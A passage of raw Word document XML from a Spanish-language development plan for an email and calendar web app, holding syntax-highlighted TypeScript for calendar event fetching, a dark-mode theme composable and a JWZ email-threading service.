        <w:t xml:space="preserve">  weekends: true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  events: fetchEvents,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  eventClick: handleEventClick,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  select: handleDateSelect,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">});</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">async function fetchEvents(info: any) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  const res = await api.get('/calendar/events', {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    params: { start: info.startStr, end: info.endStr },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  });</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  return res.data.map((evt: any) =&gt; ({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    id: evt.uid,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    title: evt.summary,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    start: evt.start,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    end: evt.end,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    allDay: evt.allDay,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  }));</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="196"/>
    <w:bookmarkEnd w:id="197"/>
    <w:bookmarkStart w:id="199" w:name="fase-6-polish-semanas-6-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.6 Fase 6: Polish (Semanas 6-7)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="198" w:name="X41dc795e879b2acacc6e9a4fd7ddc9b5352fd59"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.6.1 Dark Mode, Keyboard Shortcuts, Threading JWZ, Búsqueda Atlas Search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/web/src/composables/useTheme.ts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useTheme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">() {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> store </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">usePreferencesStore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isDark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(store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">theme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">===</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'system'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">matchMedia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'(prefers-color-scheme: dark)'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">matches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">theme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">===</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'dark'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watch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(isDark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (dark)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classList</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toggle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'dark'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dark)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { immediate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isDark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> theme</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store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">theme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">) }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/services/threading.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Algoritmo JWZ para agrupación de conversaciones</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ThreadingService {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">groupByThread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(emails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> EmailDoc[])</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EmailDoc[]</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containers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Container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</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email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> emails) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msgId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">messageId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> containers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(msgId)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container) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msgId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> parent</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children</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [] }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        containers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(msgId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> container)</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container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        container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email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Procesar In-Reply-To</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> parentId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'in-reply-to'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</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[&lt;&gt;]</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(parentId) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> parent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> containers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(parentId)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parent) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          parent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> parentId</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parent</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children</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [] }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          containers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(parentId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> parent)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">parent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> parent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        parent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
